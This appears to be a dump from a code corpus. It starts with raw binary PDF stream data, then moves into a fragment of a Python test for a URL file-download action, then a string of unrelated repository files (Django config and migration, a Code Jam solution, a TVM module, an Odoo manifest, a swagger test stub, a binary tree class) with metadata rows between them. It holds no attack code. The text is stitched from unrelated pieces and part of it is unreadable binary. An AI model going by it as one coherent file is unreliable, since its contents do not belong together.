Lk���L��������4�7�>~~�;��6��H��*�a���gp�%R��7-���K��Q���X�Z���4�nl�{�Ն���7��[�X_�p��u�rɦ�~ɘ�H7�pR:�d�j_~D�)����>��˿L��f�i**����Uda�<)����s�.���'��;��kq�$������b���ѷd��_ݔ��5x�;���*I��Nm��Hi����QJw����������󶩸�j4�4�0?�[&�PLy��v�+�5N{}t�}�'�o�-�8�Ȱ��[&�n��P�T�;xm�����N���+X�"��q�J���SZ��Ա1�Rj	~��2���p�X[R~�'��I����7	���>���=+��7�_�U}��)�[��ߍ�i�֣K���=��$�����!u��${�d]g�_�z�&Ri��8�<�5D�s\�k��ؚc/S7@��X���T^N2I��tzU5·�o��t���e��p9�a��MH`0*��b������:�.dgFO�w�h��.H���*�� h�v��V��7۬����rZ5JK���,3/|�|Co�7�Dv�}bD	�Wn����]y������ꚹ>�h�2D�� 9~~���e�/��$ã3*F+�'�V7���S���[�9n9C��ݕk�G�Am��7�³�|��X}��)�pO9�����]��3�`F�C�T׊��b�x�>jd޻�W�Yc��:��[ھ+h�\��Ap�G)�lqq@cj�GV���٤,�Q���f��~�������Gq�V;���ߪd־�[��i�ܙ
{�aܜ�w����G�LÕ�xd�$xGK��wo}��!m�l�}b�����τ#�n]�
�>�H�!�I�?cc3�S3ԂkV~
ju���.-�X0\S�W#+7��kp��u~��*ɦ����n���߲�el^�Ӌ�LW�
�_v�G���b��L�\ޭ�U XJ��" f)'Al����d���2��x;����I�~4@��p~U�@c[5b�B�D�6��g����Ԉ�)��*O'~%ٱޖ� S�� ��RܼQ����*,(�svjA�Ɲ��;06ƿ�6�G������[���,tt�&�݃���F���^þ�F�B�&��x��4-j��j����oT�tT�K�-�~��R�Χ�U��*�T�H�PCVF�B�Y�v4t:��� h���d�ߙO�"���C��.!H�UN��n����e�p{g�+��	-Q/ˡ��F��bA�1���AC�ћ��y~��׺q�I���42X"��}�����%�R8'Kb<cQ?`o��&�T@���D_��Wk��X�J���g�Gm�=�
�PDEh
]�v��m�췱����e⤊�s>��t��*�br�*�=�Yh�PQ��m�A_	W�)��`�i��<ܪx+]�M.j�����;Y�!zCCU�&��OM�^a�E��TM��*U�v�N�RHLM�s�t� n<6|�n���NU ��kID��x/��1+��V+���D�`��b��n��v�'O@~�#�Ǆ��g^]˚a�5���N�i|���)~�"�j.�����/O���7�hTkmD��"C�,��+Zb]��Vq���{���[�,TQ�]�.�
��H��Du��m�"?��:m�T��/�Ķ��~u��/�n��[��ZĂe�c��ٱ�;U��$ �۔��s����.�C*�?GA�Q�0T�M{��cԲ9S���9��2�3�����L���\��]ĸ�>:͡�F��Y�j��i���ΔoWU|6�B)f�
�����V}9,ĺ����~C�N������ ��p��jo�L�sX����[�uwa��Z����N�F�8��!;�m"=~��)�I79����:�k ])=�<k���U���V��U`��O;�"́UD���w�c�uz%��M�?s~#|�~�i��'@�� �C���8z�җ�4ԒV9�p��r�P�5�Y�|���ԭ�Y"�%F���:���l�� .a/`�㘂9����tR��h�����	�%D*���K����';��c=�����U�o��ʔ��ϙ��?��һy��═��l\�a�����p���ٷQ�`�m�$�Wgq�У(L6 @2�M�[ό�͋��~�<���֎E..��F�c��N���5ȵ��쯖~�>ҭ��T��Ѝ���1�h*�e}@LQ�#�R��y����o�ϮM�~Ę���<Y�L���}HE�h~�D(�г(��L���iw)t��vm�6��t�A3�*T�1������偞�Jw�<����+n�@\4Q�uX^:�OD�����>#|�n�q~�~�$�fќ��9�#�AdЍ�C�RV���t�����n|��7�y�o
֢��\�q��eE1�����߻�a���f��!U���n�_rD���D#=�;����n�(% ��^VCy�T����-y���h�c������ �$�&m��am9�,�݈��А�<���Ɍ
I�p�z�c�Ĕ9���=]n��1=�؜y���h!�&�8�Hn�:�τR��S������9�x_�q6&ߪo��ٷ/ܽ&��gT�ĵ �I���P49$��IE��ۨ�`i-�fo��|-�TRntC$E��[���0�^?�NDJ�˴��N�ة}�i� ;�K O\�;K^
�������{m�cz53c!�?*�0��5�}'*RH��3�U`��J�[١���`��9��?�Bj�F�����0HzB=U/���,Wh�gQj��X�ڥ<A��
�x"\��s���8�6)�*�ړ}4	�ˁc����;>|��U6\�J6J�j��L�45e2Q�,�#��]$����HU!�3-b�kJ����US�<���������+rZ`􇻖Z#��
|�}��{�f*1��@�i��ID~�B�UA�Ɛ�b��<�)��g��ܾ2�,Z��;WH���bGiI��,�7�&ͦ�Yds�M���X��$F̯q7c�~o3s�6�ְպTdb�_�G$fxF[��Y�	�fsx
��k5^�? v;����c�]�z����o�\���߉��|�2+�I�]JZ
���̵���U�a����|����ڟ���i�W��U�rR���\0�B�/��M��@H�,��@j�Y�;va���n#j-s�+Y|�P���K��=C�h��V���ۛ��u�e��ā\TS椉5>-R�s�gش���?WǮ-��Ha9H*���3��wD��"�K��K�σ���_Ҝ)9j pv�eE�j;Z�J~=@�ŉ��d��j�X���(��#�˭K`T�Ş�x�F&� zD��pGz� �N������d��Ȩ`��PX�;Į4�-'wH+��Dt	J�aM��!f7<��[ ��Y���w�w�H+Dc�I�l~���j����=���Rǵ\�C�Ȥ�;���8h�H�K��[nV�fP)��\'kJ��Mc���S�r}w�~>xf�F�5c���aC\���t�	�q��p�b����+�So5ȸ������+(Z�դ��b�M����h�F� 9�Β�� �5���:� ��1)�͏�܈�I"��>�u�K%��fH����`�oT8�8�M	�Z��fW�X}�Vf,)�Ԍ�2;+�}s��*^�ƻk�ʠF]<IIbD��
K�����]:�'X{o5g�L=B��pHr{b�Zd��>��G*����%���`�]��O�>��#�D�*�Y&��W�~�i�|$�4p&
9�)K�o��pZ�ς�r���kT;��R��+��@�w����tQ��͚�pĢ���E�u��b�n6-ԋ�� RkY~�oB�m��Q�ߥkD����D��·40���;`��peNg�f��,.�k��E��Qg����z_^
ѯ�q-���Gi�}r�+���S���W�� \�����m
�`����U���g��+onA�6P�bAhN2ݵbC����G Ws�M���:�ß��B߯��|�O��f��;��Yݲ\���P��ŜP<Q$zo�<Z�W�G�:�e�6e����6!���\�oѫц 9ƷC��i����ڦ���}��X(�(O4n���(�Rt7vM���َ�|Z9��P�7Q��F8��z8��gd�TQB��N�Q��{���F��B��N#׊�	+��$3�c��
�Tf�zִ��(_���X�e��Y����Ǐ�}cr$���v�4�s�G�l����� ]���Zi;e0�=EL��݆Zh���=[0H�B:9ʒGpw�Lϟ�b˜Ga�)^����v��0�|I���!�G��M<x�*%@���2�vs��ǩiW9��WD��^�-\��P)�t_V�<ɍw�h`d�Rv�gˠ�J�Ð���:�N*Ș7�?`2W������'�)����~�Ap�~[\�
�e����gD��R�ZT�c�O'��1��ρ*����f�q���ZyG*�5�����2:���A.|C��s6�^��6���R��7�"Qz�:�yKW���E9�a�o��}93�'���ŷ����Y<5�M�0��o�C{+�q�𥰬���}qf�u���K�N���W��k�vv��dd�Q�� Yߊ?"�	�yhj��RZ�'���W�P@q~~2�K�o���%8)�G��w��@�d*quB5xn�i�{V���g����j�L�n�$�@�У�J-�c�����x��v�ҋ�wX��G������P�DS�*��D�FoRE;�����`��f�tY�,��i||��U}��-� ["������$��ay�4@hcP�ّ��ذ������͵��o��]]vv;�V<`��r�$�H�g�N��{*�(I�le]F"�b�e�R0������ׅMi�A�ت�?�G�˹���N�Ep�O4�6�X�ї��?����qѳŗUv8y~B�� ��e���/��c(,���xX~N�ĩ����,%�:�CX�R�4xzS�)ƻ���A+� L���H���:G����r�C���fhI�{���ܦ���6a�ַ1P��b���sSR��W悏�i��b��y˻Jܗ��}���;�&RL���D;��q�PL�F��֘��\�3�x0��?oa%�����/�yQ�������LӠ�6"�����6�}��}6�bih@8���c��+�����|�:�}Z]�5�Ӵdސ�e\է	���w�?�T8U�����/�Qe���7V�Wg��
O���\�Ss��,���7��V�zbh
�}�L|�i$|�7��%"�/B*9H��Z��G֍��P9�z�P����"�$0�ԿCu���Ǧ�YCBTV�I߽��W) d�+�b�����ӏn{��,麱��i�vqu����e��ǐCER�J.�ٹԷ$e�	����|WD�Xb�{ͽk�{�>�m�K�G�DNh,��X1b4�������'TfE��x�4l�$���oK�ss���S����B��]n,��)~��_��[7�@��������-��{�����F�Ы�u=�s�h~�4���:a-�-5���
�	�@���W^ߡ(��Q�%M�BRKeL��<���Y��a%#���,Ml��s���ܵđ�GP��X$�[��S���5�F#P5����w���>v	��biT̵��rV-��Y3E�7��h:�N�o����!������W�P��ᙛ�$��YA�J�I��^w]OO��#��0Fm�;��|c�N�*�)̴�K�di�n]��V"�A:?@������PCd	��*px����_���M���e⁉�ل8g����(��d<	A&E�Ż����hO�Sտg\�l�r����t-JGE0,�N��z������� �?G1כ�QC�+ȽC�k�k8۵�/�c$�#��H��=�KN�F���Ʉq8^\���������پd���O�ӳ%i��=���+�7H��Ĩ�Y1ٖ�Xǵ�3�+�f��KC:�}�aWM�}z���N��U��F�P �d�>��X�p����t��y�d$�\#�㪫�s������(*WeMo��z�Lg��X�E3��ޞ�������M�u�qq��%̇�6|<Ɖ��`]���������w����5��թ��F��ػ��Һ�P�^�'�e^P_�����3�m�t,@���P�{ᗗ�Y]�����΋��J�t�̒-�eDgM������9]oqg�*9��$���okH���O��4�RZzI��tCV��l��ͧ-st_He��80��:gj��[Hʥ���8Lh�?]G�:
endstream
endobj
10 0 obj
<< /Filter /FlateDecode /Length 740 >>
stream
x�mU�n�0��+��J�b;$�
!�	�8�*�j���n$H�$����#�l{ ����3�`�~�l'�l�f>r�j���f��ܵ��]�瓩�_Ɣ�g�'��5���>�d��,yS�siF��$mޫ�S��3&ũ|�?Wǡ�'ܷj8Z�w����M��%�M�WM���#���u�6'x��E���U]v1li������2r���o?���6��	�K6}����}8����+MW����F��ٞ��h���`�b�9؆����ɰ�w�����0�ƂTMi�vW�nW��`���-�|���o.���HM,����h,eh��Q��&CM��-���,���8Q�`q�L0��h�z(�P��.Vר �������,�h,%��%ա���5���8�8pL������B���$q�Ʃ/0��8�x��?r��x�y!�B��=�X������y���82�VAנp�"����Z�q�x�8tkxΛ��_�����S�8k�H`�����n���k̀��RONH=CpB:#=�%8��88њ�BC��/�9�!ɨ~B�}���Rq҉�T��FI��ܨ�ύ�|nT�s���|neEA��xw���I}�Ɵ����I��y��k�t��g>O:�yұϓN|����I/|���y���I�>O:�y�k�'��<���)>O��yJg�;s�|�K�ۄw���箳�{l�C�'����=n����=���F�y���P
endstream
endobj
11 0 obj
<< /Type /ObjStm /Length 522 /Filter /FlateDecode /N 5 /First 32 >>
stream
x�uSYk�@~ﯘǖb�ޒ b�!m	�{���I�HFR ����U�M҂4��ͱ3\ .A+�����Hg �����kG�ϝ/�����]��#�{�����d�Q�b�>��W�?�>.��8#��qQ=p�/�P��a�z�ա��ه���ǃ�DI�t�ۦ�v��o�9�����zp}�B}5��l{���8����ț�����ub&�I�ȉ�4M2��[{󧚁R*QA"��'�L��I>�ED�KHs�b/�e���mQy�*��xSE@U�+=Рq��,s5�����d�Fa�k,�T�z?ix�AG}�!�f�O:;�K�"��'|�əxNO�����k.��^#����o*N�S���C�Z���YC�t���b(--���bq�l��&1�$Ҟ�3z�����5Xa���P��c�]k�=? ��qh3�����@���ϻGZ�]�L���o��fo!G��oŽ}}�Wc�oʋ�"Wף��A��W�,���Q��z���_
endstream
endobj
1 0 obj
<< /CreationDate (D:20211216143257Z) /Creator (TeX) /ModDate (D:20211216143257Z) /PTEX.Fullbanner (This is pdfTeX, Version 3.141592653-2.6-1.40.23 \(TeX Live 2021\) kpathsea version 6.3.3) /Producer (pdfTeX-1.40.23) /Trapped /False >>
endobj
2 0 obj
<< /Type /XRef /Length 21 /Filter /FlateDecode /DecodeParms << /Columns 4 /Predictor 12 >> /W [ 1 2 1 ] /Size 3 /ID [<4dac181eb10e569cb7930abd3bbd36e1><f8f4a6b9f7562a333372614367963140>] >>
stream
x�cb &F�^&�_ ��
endstream
endobj
               
startxref
216
%%EOF
", "status_code": 200, } self.assertEqual(actual, expected) def test_get_txt_file(self, mock_get, mock_create_url, mock_cach): actual = self.action.run({Input.URL: "https://test.com/v1/test.txt", Input.IS_VERIFY: False}) expected = { "bytes": "dGVzdAp0ZXN0IGZpbGUKc29tZSB0ZXN0IGRhdGE=", "status_code": 200, } self.assertEqual(actual, expected) def test_get_txt_file_with_checksum(self, mock_get, mock_create_url, mock_cach): actual = self.action.run( { Input.URL: "https://test.com/v1/test.txt", Input.CHECKSUM: "5084335576ea9ec4e9d1dcd7536dec3713b3a57a", Input.IS_VERIFY: False, } ) expected = { "bytes": "dGVzdAp0ZXN0IGZpbGUKc29tZSB0ZXN0IGRhdGE=", "status_code": 200, } self.assertEqual(actual, expected) def test_get_txt_file_with_bad_checksum(self, mock_get, mock_create_url, mock_cach): with self.assertRaises(PluginException) as context: self.action.run( { Input.URL: "https://test.com/v1/test.txt", Input.CHECKSUM: "5084335576ea9ec4e9d1dcd7536dec3713b3a57aa", Input.IS_VERIFY: False, } ) self.assertEqual( "Checksums between the downloaded file and provided checksum did not match.", context.exception.cause ) self.assertEqual( "Verify the file you meant to download and the checksum you provided are correct.", context.exception.assistance, ) @patch("insightconnect_plugin_runtime.helper.open_url", side_effect=Util.mocked_url_open) def test_is_verify(self, mock_get, mock_request, mock_create_url_meta, mock_open_cache): actual = self.action.run({Input.URL: "https://test.com/v1/test.txt", Input.IS_VERIFY: True}) self.assertTrue(mock_get.call_args_list[0][1].get("verify"))
85ae61cc05563eee47e7f771d1f64d635a86292e
192dec1ea734fd67a3c3720228826cf754b2da5a
/valeo/vr/apps.py
b88f93e9775d8048cb831c38beadcdde6919dbff
[]
no_license
fafaschiavo/cpi_valeo
a4df4e64161e58e44ade276f0b6284abfb5af6d2
777ef6173bbc4bf5941098cb2ea3b13fccf490c1
refs/heads/master
2020-04-06T04:14:59.226013
2017-05-02T22:39:00
2017-05-02T22:39:00
82,980,893
0
0
null
null
null
null
UTF-8
Python
false
false
120
py
from __future__ import unicode_literals from django.apps import AppConfig class VrConfig(AppConfig): name = 'vr'
5113f8bf9f0595543e85f6a8f9655e1f589b4282
6d724d9326ede63fd940cc5d39920f38d987e716
/shop/migrations/0004_orders_orderupdate.py
9b38da972769d22736faa52aba4630c6afddc452
[]
no_license
Alan-thapa98/mac
5dea8254276ce79fd7f11e20772b43e3a9943602
a5317bcb1d6b1fde9b726dc2b0c99ddd85f18b45
refs/heads/master
2023-07-11T05:45:05.075152
2021-07-30T12:00:02
2021-07-30T12:00:02
391,047,535
2
0
null
null
null
null
UTF-8
Python
false
false
1,370
py
# Generated by Django 3.1.2 on 2021-01-24 12:43 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('shop', '0003_contact'), ] operations = [ migrations.CreateModel( name='Orders', fields=[ ('order_id', models.AutoField(primary_key=True, serialize=False)), ('items_json', models.CharField(max_length=5000)), ('amount', models.IntegerField(default=0)), ('name', models.CharField(max_length=90)), ('email', models.CharField(max_length=111)), ('address', models.CharField(max_length=111)), ('city', models.CharField(max_length=111)), ('state', models.CharField(max_length=111)), ('zip_code', models.CharField(max_length=111)), ('phone', models.CharField(default='', max_length=111)), ], ), migrations.CreateModel( name='OrderUpdate', fields=[ ('update_id', models.AutoField(primary_key=True, serialize=False)), ('order_id', models.IntegerField(default='')), ('update_desc', models.CharField(max_length=5000)), ('timestamp', models.DateField(auto_now_add=True)), ], ), ]
[ "alanthapa98.gmail.com" ]
alanthapa98.gmail.com
d3a903414652662f91ef2a9f09ed1a87342d49bf
15f321878face2af9317363c5f6de1e5ddd9b749
/solutions_python/Problem_201/436.py
78e4a99556ff805c431b31596155fa8617440523
[]
no_license
dr-dos-ok/Code_Jam_Webscraper
c06fd59870842664cd79c41eb460a09553e1c80a
26a35bf114a3aa30fc4c677ef069d95f41665cc0
refs/heads/master
2020-04-06T08:17:40.938460
2018-10-14T10:12:47
2018-10-14T10:12:47
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,143
py
f = open('C:\\Users\\djspence\\Downloads\\C-large.in', 'r') tries = int(f.readline()) for case in range(0, tries): lengths = {} vals = f.readline().strip().split(' ') n = int(vals[0]) remaining = int(vals[1]) lengths[n] = 1 small = 0 large = 0 while remaining > 0: lk = lengths.keys() maxLen = max(lk) num = lengths[maxLen] del lengths[maxLen] if maxLen%2 == 1: small = maxLen/2 large = maxLen/2 if small in lk: lengths[small]=lengths[small]+2*num else: lengths[small]=2*num else: small = maxLen/2-1 large = maxLen/2 if small in lk: lengths[small]=lengths[small]+num else: lengths[small]=num if large in lk: lengths[large]=lengths[large]+num else: lengths[large]=num remaining = remaining - num print("Case #" + str(case+1)+": " + str(large) + " " + str(small))
1898f53db1e53665c6f69f9ef8b54411b060dd23
75983ccc6e1eba55890429baace2bf716ac4cf33
/python/tvm/relay/ir_pass.py
84189c840d71a5dccdc08b92a22eb837b2fb5405
[ "Apache-2.0" ]
permissive
clhne/tvm
49c8be30c87791d5e8f13eea477620a829573d1c
d59320c764bd09474775e1b292f3c05c27743d24
refs/heads/master
2020-03-29T21:16:30.061742
2018-09-25T19:15:15
2018-09-25T19:15:15
150,358,639
1
0
Apache-2.0
2018-09-26T02:41:46
2018-09-26T02:41:45
null
UTF-8
Python
false
false
372
py
# pylint: disable=no-else-return, # pylint: disable=unidiomatic-typecheck """The set of passes for Relay. Exposes an interface for configuring the passes and scripting them in Python. """ from . import _ir_pass # Expose checking expression, should rename to infer_type. # pylint: disable=invalid-name check_expr = _ir_pass.check_expr well_formed = _ir_pass.well_formed
95b7481abd5da44b653139b6e671965a8b6bc81e
2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae
/python/python_24692.py
165e8518e2ba9cad5538a7ef480b9d654979df4a
[]
no_license
AK-1121/code_extraction
cc812b6832b112e3ffcc2bb7eb4237fd85c88c01
5297a4a3aab3bb37efa24a89636935da04a1f8b6
refs/heads/master
2020-05-23T08:04:11.789141
2015-10-22T19:19:40
2015-10-22T19:19:40
null
0
0
null
null
null
null
UTF-8
Python
false
false
63
py
# Python NameError: name 'self' is not defined Why? python -tt
2a04c078859847f83b2a810252c0bd0a2a0367e9
da052c0bbf811dc4c29a83d1b1bffffd41becaab
/core/web_debranding/__manifest__.py
2626a321be85b590c2375e95e0b69f7ad52c0bfc
[]
no_license
Muhammad-SF/Test
ef76a45ad28ac8054a4844f5b3826040a222fb6e
46e15330b5d642053da61754247f3fbf9d02717e
refs/heads/main
2023-03-13T10:03:50.146152
2021-03-07T20:28:36
2021-03-07T20:28:36
null
0
0
null
null
null
null
UTF-8
Python
false
false
824
py
# -*- coding: utf-8 -*- { 'name': "Backend debranding", 'version': '1.1.1', 'author': 'IT-Projects LLC, Ivan Yelizariev', 'license': 'LGPL-3', 'category': 'Debranding', 'images': ['images/web_debranding.png'], 'website': 'https://twitter.com/yelizariev', 'price': 150.00, 'currency': 'EUR', 'depends': [ 'web', 'mail', 'web_planner', 'access_apps', 'access_settings_menu', 'mail_base', ], 'data': [ 'security/web_debranding_security.xml', 'security/ir.model.access.csv', 'data.xml', 'views.xml', 'js.xml', 'pre_install.yml', ], 'qweb': [ 'static/src/xml/web.xml', ], 'auto_install': False, 'uninstall_hook': 'uninstall_hook', 'installable': True }
6997ba18d8ad2fb05c77cb9cbd2942726bf65798
fd4aba49cbd4042a95e7376eac245df0e95b72d3
/auto-generated/python/test/test_margin.py
a5287ac7cde2c798af31194cd8a629e51b3cef2c
[]
no_license
bretton/api-connectors
47755e7ec4701a600b3bf6a541c618573e97e365
e8b9de34ff941c3edae2b094f6ab0eb1c24bf8bb
refs/heads/master
2020-04-14T20:01:38.746415
2019-12-20T11:43:05
2019-12-20T11:43:05
164,079,343
2
2
null
2019-12-20T11:43:06
2019-01-04T08:21:45
C++
UTF-8
Python
false
false
2,277
py
# coding: utf-8 """ BitMEX API ## REST API for the BitMEX Trading Platform [View Changelog](/app/apiChangelog) #### Getting Started Base URI: [https://www.bitmex.com/api/v1](/api/v1) ##### Fetching Data All REST endpoints are documented below. You can try out any query right from this interface. Most table queries accept `count`, `start`, and `reverse` params. Set `reverse=true` to get rows newest-first. Additional documentation regarding filters, timestamps, and authentication is available in [the main API documentation](/app/restAPI). *All* table data is available via the [Websocket](/app/wsAPI). We highly recommend using the socket if you want to have the quickest possible data without being subject to ratelimits. ##### Return Types By default, all data is returned as JSON. Send `?_format=csv` to get CSV data or `?_format=xml` to get XML data. ##### Trade Data Queries *This is only a small subset of what is available, to get you started.* Fill in the parameters and click the `Try it out!` button to try any of these queries. * [Pricing Data](#!/Quote/Quote_get) * [Trade Data](#!/Trade/Trade_get) * [OrderBook Data](#!/OrderBook/OrderBook_getL2) * [Settlement Data](#!/Settlement/Settlement_get) * [Exchange Statistics](#!/Stats/Stats_history) Every function of the BitMEX.com platform is exposed here and documented. Many more functions are available. ##### Swagger Specification [⇩ Download Swagger JSON](swagger.json) ## All API Endpoints Click to expand a section. 
# noqa: E501 OpenAPI spec version: 1.2.0 Contact: [email protected] Generated by: https://github.com/swagger-api/swagger-codegen.git """ from __future__ import absolute_import import unittest import swagger_client from swagger_client.models.margin import Margin # noqa: E501 from swagger_client.rest import ApiException class TestMargin(unittest.TestCase): """Margin unit test stubs""" def setUp(self): pass def tearDown(self): pass def testMargin(self): """Test Margin""" # FIXME: construct object with mandatory attributes with example values # model = swagger_client.models.margin.Margin() # noqa: E501 pass if __name__ == '__main__': unittest.main()
db166c5dcc339e356cf775d43a928a65440502ce
7130a96ef7c2199cdb52406069fdc5e015760d70
/components/docker/block/SPResnetBlockV2.py
858733a371f31bb60c735dd0184b8db52d6b793f
[]
no_license
yanqinghao/AiLab-Pytorch
c37e8f47241d7f1a003226b2a19b9406ff7f6f9b
ceea8a1196dca4d219a099cbaedcecf7c3f96564
refs/heads/master
2021-07-08T07:15:29.801492
2020-10-23T06:14:34
2020-10-23T06:14:34
198,990,470
0
0
null
2019-08-14T09:23:00
2019-07-26T09:40:58
Python
UTF-8
Python
false
false
734
py
# coding=utf-8 from __future__ import absolute_import, print_function import suanpan from suanpan.app.arguments import Int from suanpan.app import app from args import PytorchLayersModel from utils import getLayerName, net @app.input(PytorchLayersModel(key="inputModel")) @app.param(Int(key="inplanes", default=64)) @app.param(Int(key="planes", default=64)) @app.output(PytorchLayersModel(key="outputModel")) def SPResnetBlockV2(context): args = context.args model = args.inputModel name = getLayerName(model.layers, "ResnetBlockV2") setattr(model, name, net.ResnetBlockV2(args.inplanes, args.planes)) model.layers[name] = getattr(model, name) return model if __name__ == "__main__": suanpan.run(app)
87503f32f0ebd1aa3c6acc09980ebdaeb4ed6a34
0438cb6726cd47f17b75cc960d457e433beeed95
/tests/test_cli.py
7e6cc9f4c08378936ae125b5e9812674ea17fbb7
[ "MIT" ]
permissive
boydgreenfield/metasort
3071aa4600f6b5f0ba9eeb431b1cbcc7c1399102
27622d75f36b1dde959c269cb90b57f4110d813b
refs/heads/master
2021-01-22T20:39:08.266721
2015-04-10T18:57:12
2015-04-10T18:57:12
33,745,227
0
0
null
2015-04-10T18:53:23
2015-04-10T18:53:23
null
UTF-8
Python
false
false
49
py
from nose.tools import * def test_base(): pass
c7049fd951803d6bc6f19109023f9ea5c5d783c2
a3e4cc590667c444460d3a1f659f53f907da1783
/azure/mgmt/blueprint/models/assignment_deployment_job_result_py3.py
52b07be3a07c2f65071a62d8c0a9f5ad292585ef
[]
no_license
eduardomourar/azure-mgmt-blueprint
729d9c08915caab9e8029278da6dc87c4eaa44d6
153c3c63cb519350cb68752e07251e1e8ff26510
refs/heads/master
2020-05-27T02:26:42.436079
2019-11-11T11:52:14
2019-11-11T11:52:14
188,451,854
0
0
null
null
null
null
UTF-8
Python
false
false
1,334
py
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- from msrest.serialization import Model class AssignmentDeploymentJobResult(Model): """Result of each individual deployment in a blueprint assignment. :param error: Contains error details if deployment job failed. :type error: ~azure.mgmt.blueprint.models.AzureResourceManagerError :param resources: Resources created as result of the deployment job. :type resources: list[~azure.mgmt.blueprint.models.AssignmentJobCreatedResource] """ _attribute_map = { 'error': {'key': 'error', 'type': 'AzureResourceManagerError'}, 'resources': {'key': 'resources', 'type': '[AssignmentJobCreatedResource]'}, } def __init__(self, *, error=None, resources=None, **kwargs) -> None: super(AssignmentDeploymentJobResult, self).__init__(**kwargs) self.error = error self.resources = resources
647577be7019d95438e3a5c1aa3b2dcbafb93134
c6053ad14e9a9161128ab43ced5604d801ba616d
/Public/Public_zqxt_99/__init__.py
4f5ee4f58760d9dfb875cffb3773d9d9dbf5771b
[]
no_license
HesterXu/Home
0f6bdace39f15e8be26031f88248f2febf33954d
ef8fa0becb687b7b6f73a7167bdde562b8c539be
refs/heads/master
2020-04-04T00:56:35.183580
2018-12-25T02:48:51
2018-12-25T02:49:05
155,662,403
0
0
null
null
null
null
UTF-8
Python
false
false
164
py
# -*- coding: utf-8 -*- # @Time : 2018/12/11/10:55 # @Author : Hester Xu # Email : [email protected] # @File : __init__.py.py # @Software : PyCharm
bf9b4c55e0e0b67ded0e6452ab8893a773b3fb88
d469de9070628b7c56e283066d9122eb73c42dd2
/algorithms/data_structures/binary_tree.py
7dad06d856241373ca5e8bfd012d65a0b853afdc
[]
no_license
Rowing0914/Interview_Prep_Python
af26369ccb92c623fc2ac44e62d3f61e94046df6
a77a9b2342fbc9fc87b9f3670b0f3ab36f47eac7
refs/heads/master
2022-11-26T10:22:44.564728
2020-08-07T12:06:54
2020-08-07T12:06:54
269,878,434
2
0
null
null
null
null
UTF-8
Python
false
false
923
py
class Node: def __init__(self, value): self.l = None self.r = None self.v = value class BinaryTree: def __init__(self): self.root = None def add(self, item): if self.root == None: self.root = Node(value=item) else: self._add(item, self.root) def _add(self, item, node): if item > node.v: print("right: ", item) if node.r == None: node.r = Node(value=item) else: self._add(item, node.r) else: print("lefft: ", item) if node.l == None: node.l = Node(value=item) else: self._add(item, node.l) def printTree(self): if self.root == None: print("Nothing") else: self._printTree(self.root) def _printTree(self, node): if node != None: self._printTree(node.l) print(str(node.v) + " ") self._printTree(node.r) if __name__ == '__main__': tree = BinaryTree() tree.add(3) tree.add(4) tree.add(0) tree.add(8) tree.add(2) tree.printTree()
843d02469e85866f10c030b14a8b34b1ddb154ba
cfcd117378664e4bea080b3c1011a25a575b3d51
/hawc/apps/vocab/migrations/0004_term_uid.py
f894ab0af5c902c93c900e051fb9821419084ebb
[ "MIT" ]
permissive
shapiromatron/hawc
9d3a625da54d336334da4576bd5dac6915c18d4f
51177c6fb9354cd028f7099fc10d83b1051fd50d
refs/heads/main
2023-08-03T13:04:23.836537
2023-08-01T18:39:16
2023-08-01T18:39:16
25,273,569
25
15
NOASSERTION
2023-09-14T17:03:48
2014-10-15T21:06:33
Python
UTF-8
Python
false
false
348
py
from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ("vocab", "0003_load_v1"), ] operations = [ migrations.AddField( model_name="term", name="uid", field=models.PositiveIntegerField(blank=True, null=True, unique=True), ), ]
d0e245f285f7028136bf38a0f29d170d8c9f4d5a
8bb4a472344fda15985ac322d14e8f4ad79c7553
/Python3-Core/src/test/prompto/translate/eme/TestCss.py
801cb78f8fe015a3e6257711209c57258ee542a1
[]
no_license
prompto/prompto-python3
c6b356f5af30c6826730ba7f2ad869f341983a2d
64bd3d97d4702cc912097d41d961f7ab3fd82bee
refs/heads/master
2022-12-24T12:33:16.251468
2022-11-27T17:37:56
2022-11-27T17:37:56
32,623,633
4
0
null
2019-05-04T11:06:05
2015-03-21T07:17:25
Python
UTF-8
Python
false
false
767
py
from prompto.parser.e.BaseEParserTest import BaseEParserTest class TestCss(BaseEParserTest): def setUp(self): super(type(self), self).setUp() def testCodeValue(self): self.compareResourceEME("css/codeValue.pec") def testCompositeValue(self): self.compareResourceEME("css/compositeValue.pec") def testHyphenName(self): self.compareResourceEME("css/hyphenName.pec") def testMultiValue(self): self.compareResourceEME("css/multiValue.pec") def testNumberValue(self): self.compareResourceEME("css/numberValue.pec") def testPixelValue(self): self.compareResourceEME("css/pixelValue.pec") def testTextValue(self): self.compareResourceEME("css/textValue.pec")
e89461a51e52313d597915885da1df109637baae
ae288b9604ee86b471d698023fce03738b578544
/lib/system/__init__.py
d3474854c5d8888f77545f1a7a11a08f805ffc55
[]
no_license
snaress/studio
a8421a0772600494859ba86daace4bf499f8e055
90f4fc50ca9541c0d70cb381c8002ef8a3ce8087
refs/heads/master
2021-01-17T05:49:57.193795
2016-02-07T13:57:24
2016-02-07T13:57:24
25,691,833
0
0
null
null
null
null
UTF-8
Python
false
false
147
py
import os #-- Package Var --# toolPath = os.path.normpath(os.path.dirname(__file__)) toolName = toolPath.split(os.sep)[-1] toolPack = __package__
d531ac6b14b28efdbcaa7dbcc9edad4029ab4ccf
0ff562277646000e7f05c68e18133466effeb962
/seq2seq/evaluate.py
9356c281bfea4c511ab9d95e5d84048c069e162c
[]
no_license
zyxue/bio-seq2seq-attention
708fd8a73f69c8564d488c185dba792e3570cbed
692614f4d025c78800ecd6c104c430e2bff11edf
refs/heads/master
2020-04-16T21:34:59.626246
2019-02-22T00:42:40
2019-02-22T00:42:40
165,930,778
3
0
null
null
null
null
UTF-8
Python
false
false
1,839
py
